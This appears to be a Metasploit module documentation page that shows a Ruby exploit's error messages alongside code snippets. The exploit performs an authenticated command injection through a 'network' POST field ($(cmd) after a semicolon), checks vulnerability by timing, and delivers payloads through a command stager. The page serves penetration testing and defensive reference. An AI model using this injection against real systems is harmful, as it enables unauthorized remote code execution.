<PEER> - The host responded with an unexpected status code: <RES.CODE>.


Here is a relevant code snippet related to the "<PEER> - The host responded with an unexpected status code: <RES.CODE>." error message:

114:	    if res.code == 200
115:	      print_good("#{peer} - Authenticated successfully.")
116:	    elsif res.code == 401
117:	      print_error("#{peer} - Authentication failed.")
118:	    else
119:	      print_error("#{peer} - The host responded with an unexpected status code: #{res.code}.")
120:	    end
121:	    return res
122:	  rescue ::Rex::ConnectionError
123:	    print_error('Caught a Rex::ConnectionError in login() method. Connection failed.')
124:	    return nil

Caught a Rex::ConnectionError in login() method. Connection failed.


Here is a relevant code snippet related to the "Caught a Rex::ConnectionError in login() method. Connection failed." error message:

118:	    else
119:	      print_error("#{peer} - The host responded with an unexpected status code: #{res.code}.")
120:	    end
121:	    return res
122:	  rescue ::Rex::ConnectionError
123:	    print_error('Caught a Rex::ConnectionError in login() method. Connection failed.')
124:	    return nil
125:	  end
126:	
127:	  def execute_command(cmd, _opts = {})
128:	    send_request_cgi({

Connection failed.


Here is a relevant code snippet related to the "Connection failed." error message:

132:	      'vars_post' => {
133:	        'network' => ";$(#{cmd})"
134:	      }
135:	    })
136:	  rescue ::Rex::ConnectionError
137:	    fail_with(Failure::Unreachable, 'Connection failed.')
138:	  end
139:	
140:	  def check
141:	    res = login(user, pass)
142:	    unless res

No response was received from <PEER> whilst in check(), check it is online and the target port is open!


Here is a relevant code snippet related to the "No response was received from <PEER> whilst in check(), check it is online and the target port is open!" error message:

138:	  end
139:	
140:	  def check
141:	    res = login(user, pass)
142:	    unless res
143:	      print_error("No response was received from #{peer} whilst in check(), check it is online and the target port is open!")
144:	      return CheckCode::Detected
145:	    end
146:	    if res.code == 200
147:	      version = get_target(res)
148:	      if version.nil?

<PEER> - Connection failed whilst trying to perform the command injection.


Here is a relevant code snippet related to the "<PEER> - Connection failed whilst trying to perform the command injection." error message:

156:	      print_status("#{peer} - Verifying remote code execution by attempting to execute '#{cmd}'.")
157:	      t1 = Time.now.to_i
158:	      res = execute_command(cmd)
159:	      t2 = Time.now.to_i
160:	      unless res
161:	        print_error("#{peer} - Connection failed whilst trying to perform the command injection.")
162:	        return CheckCode::Detected
163:	      end
164:	      diff = t2 - t1
165:	      if diff >= delay
166:	        print_good("#{peer} - Response received after #{diff} seconds.")

<PEER> - Response wasn't received within the expected period of time.


Here is a relevant code snippet related to the "<PEER> - Response wasn't received within the expected period of time." error message:

164:	      diff = t2 - t1
165:	      if diff >= delay
166:	        print_good("#{peer} - Response received after #{diff} seconds.")
167:	        return CheckCode::Vulnerable
168:	      else
169:	        print_error("#{peer} - Response wasn't received within the expected period of time.")
170:	        return CheckCode::Safe
171:	      end
172:	    end
173:	  rescue ::Rex::ConnectionError
174:	    print_error("#{peer} - Rex::ConnectionError caught in check(), could not connect to the target.")

<PEER> - Rex::ConnectionError caught in check(), could not connect to the target.


Here is a relevant code snippet related to the "<PEER> - Rex::ConnectionError caught in check(), could not connect to the target." error message:

169:	        print_error("#{peer} - Response wasn't received within the expected period of time.")
170:	        return CheckCode::Safe
171:	      end
172:	    end
173:	  rescue ::Rex::ConnectionError
174:	    print_error("#{peer} - Rex::ConnectionError caught in check(), could not connect to the target.")
175:	    return CheckCode::Unknown
176:	  end
177:	
178:	  def exploit
179:	    res = login(user, pass)

No response was received from <PEER> whilst in exploit(), check it is online and the target port is open!


Here is a relevant code snippet related to the "No response was received from <PEER> whilst in exploit(), check it is online and the target port is open!" error message:

176:	  end
177:	
178:	  def exploit
179:	    res = login(user, pass)
180:	    unless res
181:	      print_error("No response was received from #{peer} whilst in exploit(), check it is online and the target port is open!")
182:	    end
183:	    if res.code == 200
184:	      version = get_target(res)
185:	      if version.nil?
186:	        print_error("#{peer} - The target is not vulnerable.")

<PEER> - The target is not vulnerable.


Here is a relevant code snippet related to the "<PEER> - The target is not vulnerable." error message:

181:	      print_error("No response was received from #{peer} whilst in exploit(), check it is online and the target port is open!")
182:	    end
183:	    if res.code == 200
184:	      version = get_target(res)
185:	      if version.nil?
186:	        print_error("#{peer} - The target is not vulnerable.")
187:	        return false
188:	      end
189:	      print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)...")
190:	      case target['Type']
191:	      when :unix_memory

Rex::ConnectionError caught in check(), could not connect to the target.


Here is a relevant code snippet related to the "Rex::ConnectionError caught in check(), could not connect to the target." error message:

191:	      when :unix_memory
192:	        execute_command(payload.encoded)
193:	      when :linux_dropper
194:	        execute_cmdstager(linemax: 130_000)
195:	      end
196:	    end
197:	  rescue ::Rex::ConnectionError
198:	    print_error('Rex::ConnectionError caught in check(), could not connect to the target.')
199:	    return false
200:	  end
201:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Anastasios Stasinopoulos (@ancst)

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.